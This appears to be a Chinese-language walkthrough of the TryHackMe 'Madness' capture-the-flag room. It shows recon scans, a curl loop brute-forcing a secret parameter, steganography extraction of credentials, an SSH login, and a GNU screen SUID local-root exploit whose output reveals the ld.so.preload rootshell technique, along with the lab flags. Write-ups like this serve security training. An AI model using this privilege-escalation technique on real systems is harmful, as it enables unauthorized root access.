服务发现

┌──(root💀kali)-[~/tryhackme/Madness]
└─# nmap -sV -Pn 10.10.123.91          
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 23:19 EDT
Nmap scan report for 10.10.123.91
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds

目录爆破

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 -u http://10.10.123.91

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-27_23-20-38.log

Target: http://10.10.123.91

[23:20:39] Starting: 
[23:20:40] 200 -   11KB - /
[23:26:05] 403 -  278B  - /server-status  

主页分析

没有任何目录，只有一个首页
网页源代码里有一行注释

They will never find me

上面代码指向一张不能打开的图片，地址是http://10.10.123.91/thm.jpg

把图片下载到本地分析

用exiftool分析文件,发现按照文件分析这本来是一个png文件，但是却以jpg作为后缀

┌──(root💀kali)-[~/tryhackme/Madness]
└─# exiftool thm.jpg
ExifTool Version Number         : 12.16
File Name                       : thm.jpg
Directory                       : .
File Size                       : 22 KiB
File Modification Date/Time     : 2021:09:27 23:56:02-04:00
File Access Date/Time           : 2021:09:27 23:56:02-04:00
File Inode Change Date/Time     : 2021:09:27 23:56:02-04:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Warning                         : PNG image did not start with IHDR

查看图片源，文件头声明是PNG

┌──(root💀kali)-[~/tryhackme/Madness]
└─# head thm.jpg
�PNG
▒
��C


▒▒��C
�����

���}!1AQa"q2��#B��R��$3br�
▒▒%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������

���w!1AQaq"2B����       #3R�br�
$4�%�▒▒&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������

用sublime打开thm.jpg文件，把
8950 4e47 0d0a 1a0a 0000 0001

改成

ffd8 ffe0 0010 4a46 4946 0001

然后保存。再打开thm.jpg文件，图片可以正常显示，根据图片提示

hidden directory
/th1s_1s_h1dd3n

打开http://10.10.123.91/th1s_1s_h1dd3n/
显示：

Welcome! I have been expecting you!
To obtain my identity you need to guess my secret!
Secret Entered:
That is wrong! Get outta here!

查看网页源代码，有一行注释

It's between 0-99 but I don't think anyone will look here

我们在网页上加上一个secret参数：http://10.10.123.91/th1s_1s_h1dd3n/?secret=0

网页发送了变化：Secret Entered: 0

编写一个bash脚本，遍历0~99的请求参数，把结果输出到answer.txt

#!/bin/bash
for i in {0..100}
do 
    curl http://10.10.123.91/th1s_1s_h1dd3n/?secret=$i >> answer.txt
done

查阅answer.txt显示73返回不一样

<html>
<head>
  <title>Hidden Directory</title>
  <link href="stylesheet.css" rel="stylesheet" type="text/css">
</head>
<body>
  <div class="main">
<h2>Welcome! I have been expecting you!</h2>
<p>To obtain my identity you need to guess my secret! </p>
<!-- It's between 0-99 but I don't think anyone will look here-->

<p>Secret Entered: 73</p>

<p>Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B</p>

</div>
</body>
</html>

y2RPJ4QaPF!B像是一串加密的东西，起初以为是base64，但是解不出来。有“！”这种特殊符号也不会是用户名。所以可能是一个密码

房间的提示，
1，不要进行ssh爆破，
2，用户名是一个something ROTten的东西

所以现在就是还差一个用户名，而且这个用户名很恶心

这里完全懵逼，以为是ssh的密码，一直在找用户名
结果原来是图片隐写的密码

┌──(root💀kali)-[~/tryhackme/Madness]
└─# steghide extract -sf thm.jpg
Enter passphrase: 
wrote extracted data to "hidden.txt".
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/Madness]
└─# cat hidden.txt 
Fine you found the password! 

Here's a username 

wbxre

I didn't say I would make it easy for you!

以为wbxre这个是一个用户名,结果这他妈原来是一个加密的字符串，加密算法是rot13
惊不惊喜
意不意外

解密出来是：joker，参考这个网站

现在有了用户名和密码，以为终于可以登录ssh了，结果密码是错的

结果是需要把房间的这个海报照片下载到本地，然后从海报中解析出密码

wget https://i.imgur.com/5iW7kC8.jpg

解析出隐藏文件

┌──(root💀kali)-[~/tryhackme/Madness]
└─# steghide extract -sf 5iW7kC8.jpg                                                                                                                                                                                                    1 ⨯
Enter passphrase: 
wrote extracted data to "password.txt".
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/Madness]
└─# cat password.txt    
I didn't think you'd find me! Congratulations!

Here take my password

*axA&GF8dP

真是骚到飞起！

现在登录ssh，拿到user.txt

┌──(root💀kali)-[~/tryhackme/Madness]
└─# ssh joker@10.10.123.91          
joker@10.10.123.91's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-170-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun Jan  5 18:51:33 2020 from 192.168.244.128
joker@ubuntu:~$ ls
user.txt
joker@ubuntu:~$ cat user.txt 
THM{d5781e53b130efe2f94f9b0354a5e4ea}
joker@ubuntu:~$ 

提权

传leapeas，枚举提权漏洞信息，发现screen 这个SUID可以提权

提权攻击脚本见这里

joker@ubuntu:/tmp$ ./exp.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
     chmod("/tmp/rootshell", 04755);
     ^
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
     setuid(0);
     ^
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
     setgid(0);
     ^
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
     seteuid(0);
     ^
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
     setegid(0);
     ^
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
     execvp("/bin/sh", NULL, NULL);
     ^
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
# id
uid=0(root) gid=0(root) groups=0(root),1000(joker)
# cat /root/root.txt
THM{5ecd98aa66a6abb670184d7547c8124a}
#